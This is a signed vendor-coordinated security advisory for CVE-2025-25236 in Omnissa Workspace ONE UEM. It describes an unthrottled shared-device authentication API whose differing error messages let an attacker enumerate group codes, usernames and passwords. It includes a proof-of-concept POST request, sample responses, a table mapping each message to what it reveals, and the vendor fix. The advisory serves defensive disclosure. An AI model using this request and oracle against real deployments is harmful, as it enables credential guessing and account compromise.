-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2025-047 Product: Workspace ONE UEM Manufacturer: Omnissa Affected Version(s): 24.6.0.21 Tested Version(s): 24.6.0.21 Vulnerability Type: Observable Response Discrepancy (CWE-204) Risk Level: High Solution Status: Fixed Manufacturer Notification: 2025-07-18 Solution Date: 2025-11-12 Public Disclosure: 2026-02-13 CVE Reference: CVE-2025-25236 Author of Advisory: Philipp Buchegger, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Omnissa Workspace ONE is a software for managing endpoint devices. The manufacturer describes the product as follows (see [1]): "Manage, secure and monitor all devices across all platforms. [...] With Omnissa Workspace ONE®, your organization can ease the operational burden on your IT workforce via an autonomous workspace, freeing them to focus on higher-value tasks." Due to an internet-exposed API with missing security features, it is possible to enumerate customer-specific sensitive information such as tenant IDs, user accounts, or user passwords. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: During testing, no rate limit, account lockout, or logging concerning the internet-exposed API were found. The vulnerable endpoint was detected by installing a custom certificate authority during the enrollment process of an Apple mobile device. It is used for authenticating the mobile application hub in a shared device scenario. The required parameter for the attack, "DeviceIdentifier", is in the format 00001234-0001A2B3C4D4E6F7, which could be brute-forced. Nevertheless, this is rather unrealistic. However, as soon as a valid device identifier is known, the parameters "GroupCode", "Username" and "Password" can be enumerated separately. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The following HTTP POST request can be used for enumerating usernames: POST /DeviceServices/awmdmsdk/v3/shareddevice/checkout/authenticate HTTP/1.1 Host: Content-Type: application/json Accept: */* Connection: keep-alive Accept-Language: de-DE Content-Length: Accept-Encoding: gzip, deflate, br User-Agent: Hub/4444 CFNetwork/3826.500.131 Darwin/24.5.0 {"DeviceIdentifier":"","GroupCode":"","Password":"","AuthenticationGroup":"com.air-watch.agent","Username":"","BundleId":"com.air-watch.agent","DeviceType":2} The corresponding HTTP response is as follows: HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: application/json; charset=utf-8 Expires: -1 X-Correlation-ID: 1caf0110-cafe-cafe-1234-cafe1234cafe x-aw-version: 24.6.0.21 Date: Tue, 15 Jul 2025 13:14:03 GMT Content-Length: 390 {"Status":10,"Message":"Ihr Konto kann nicht registriert werden. Wenden Sie sich bitte an Ihren Systemadministrator.","AWHMACKey":null,"AWAuthenticationToken":null,"EulaContentId":0,"EulaContent":null,"SharedDevicePasscodeExpirationTime":"\/Date(-62135596800000)\/","SharedDevicePasscodeForcedChangeTime":"\/Date(-62135596800000)\/","TransactionIdentifier":null,"ClearAppDataOnLogOut":null} An example for an HTTP response for device identifier enumeration is as follows: HTTP/1.1 400 Bad Request Cache-Control: no-cache, no-store Pragma: no-cache Expires: -1 X-Correlation-ID: 4f31b05c-f975-467b-b134-24b1d447510d x-aw-version: 24.6.0.21 Date: Tue, 15 Jul 2025 13:14:58 GMT Content-Length: 0 If the group code is incorrect, the error message is "Ungültige Gruppen-ID. Bitte versuchen Sie es erneut." If it is correct, but the other values are incorrect, the error message is "Ihr Konto kann nicht registriert werden. Wenden Sie sich bitte an Ihren Systemadministrator." The message "Ihr Konto kann nicht registriert werden." differs from "Ungültige Benutzeranmeldedaten" if the user account exists. If both username and password are correct, the response is "Failed to CheckOut. Device already checked out." These differences in the response behavior of the web service can be used for enumeration purposes in the following way: "Ungültige Gruppen-ID. Bitte versuchen Sie es erneut." => Group code is wrong. "Ihr Konto kann nicht registriert werden. Wenden Sie sich bitte an Ihren Systemadministrator." => Group code checks out. "Ihr Konto kann nicht registriert werden" => Username is wrong. "Ungültige Benutzeranmeldedaten" => Username checks out, password is incorrect. "Failed to CheckOut. Device already checked out." => All fields are correct. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Only provide a general, error-independent error message. See https://www.omnissa.com/omsa-2025-0005 More information: https://en.wikipedia.org/wiki/Oracle_attack ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2025-07-15: Vulnerability discovered 2025-07-18: Vulnerability reported to manufacturer 2025-09-10: Patch released by manufacturer 2026-02-13: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for Omnissa Workspace ONE for Unified Endpoint Management https://go.omnissa.com/Workspace-ONE-for-UEM [2] SySS Security Advisory SYSS-2025-047 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-047.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Philipp Buchegger and Sebastian Auwärter of SySS GmbH. E-Mail: philipp buchegger@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Philipp_Buchegger.asc Key ID: 0x065809F0BB6747E8 Key Fingerprint: 489F 34EE FA88 27DE 69A0 756B 0658 09F0 BB67 47E8 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 4.0 URL: https://creativecommons.org/licenses/by/4.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEESJ807vqIJ95poHVrBlgJ8LtnR+gFAmmPHUQACgkQBlgJ8Ltn R+ghmQ/7BZV19/Mbi9C3i2wc5HT9pHEx8/Th7bxFxwQOgrhEhFYCAPxNU7MnHQw5 LmBevLwT+wjrWbb8Ta30L68W0j80cJyaFq0xAjeGU7l2zuRHtiCHfpqRkAjlBohn ZLH99xxB4vNCqyh4G0m6fQ18YBSgWV8/z07caJ5e8uzrP4iqXv7x+5m7FXwjp+R6 ryUgOxPAmXxGbG5kk/kIod+xevUg4ZIW9+IdJLRNcfLup5xshZ6PZvz1lSJBelYJ iva7o1QHNaIYUJbGEFzKOmq72eGq/3r+iAiR9hWc9xvl807szViSw9NzIZiONpHZ fuPRsyewxsb93x3PDAafMkNpHpytq6lnHwJQKwjmTu7UMl8vxDlvO1+vRRuJHeav nna8GMVMcQZkf2B1n2UvO8+h1VXnkwreahNaIxZUPKWdRvuWG2a4gqfPhiN2tXSK CpkmhA2auNMqlqHMXL8XpKc8KQjkmQJyFOyiQsMR+n0FiZjaB9DbFp/WnoKS1Xpp 70qx2VHXGyqv8Z54xiedfmdLwfWQHLfW/hMbI0wirVGEPe95pTRoNsNC+vBSaLKl 0k5mFyypH0JsKwPMOJz1YRwOzT/HeB33i1dK7JLVG/Sp4atsLz2dZi5gv6iu1oDq pY4UCjiicGvcGVjJr3bU4dL6qAvXK0zh3UuI6PjdaOGZmYfkCxk= =Ot2P -----END PGP SIGNATURE-----